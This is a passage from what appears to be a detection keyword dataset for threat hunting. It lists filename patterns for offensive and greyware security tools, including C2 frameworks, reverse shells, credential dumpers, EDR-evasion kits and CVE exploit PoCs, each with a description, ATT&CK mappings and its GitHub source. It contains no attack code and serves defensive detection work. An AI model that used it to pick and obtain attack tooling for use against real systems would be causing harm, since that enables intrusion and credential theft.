Evasion,https://github.com/Narasimha1997/fake-sms,1,0,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*./fee.py*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*./gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,0,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*./getExploit*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z -*./gimmeSH*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z -*./go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*./hashcat -*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*./hashview/*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*./Havoc,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*./havoc *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*./hoaxshell*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*./hping *,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*./hydra *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*./inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*./Ivy -*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*./koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*./Lalin.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,1,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*./litefuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*./lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*./manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*./Microsploit*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*./monkey.sh*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*./mythic-cli *,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,0,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*./Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*./nmap*,greyware_tool_keyword,nmap,A very common tool. Network host vuln and port detector.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,1,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -*./ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*./nysm/src/,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*./pachine.py*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*./Passdetective*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*./Pcredz *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*./Phishing.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*./pwndrop *,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*./PyShell *,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,0,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*./RedGuard*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*./redirector.py *,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,0,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*./rpcrt.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*./rsocx -*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*./scan4all *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*./ScareCrow *,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./ScareCrow -*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./ScareCrow*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./seth.sh * *,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*./snake,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*./SourcePoint *,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*./sudomy*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*./t14m4t *,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,0,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*./teamserver *,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,0,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*./teamserver *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*./test/nmap*/*.nse*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*./update-beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*./Vegile*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*./xhydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*./xrkRce *,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,0,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*./zabbix.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pykiller/CVE-2022-23131,1,1,N/A,N/A,1,0,0,2022-02-24T11:59:48Z,2022-02-24T11:34:27Z -*./zexp check -*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/jweny/zabbix-saml-bypass-exp,1,0,N/A,N/A,1,94,42,2022-02-21T04:27:48Z,2022-02-18T08:38:53Z -*.\dumpy.py*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*.\stager.ps1*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*.admin.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.adminusers.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.api.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.apps.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 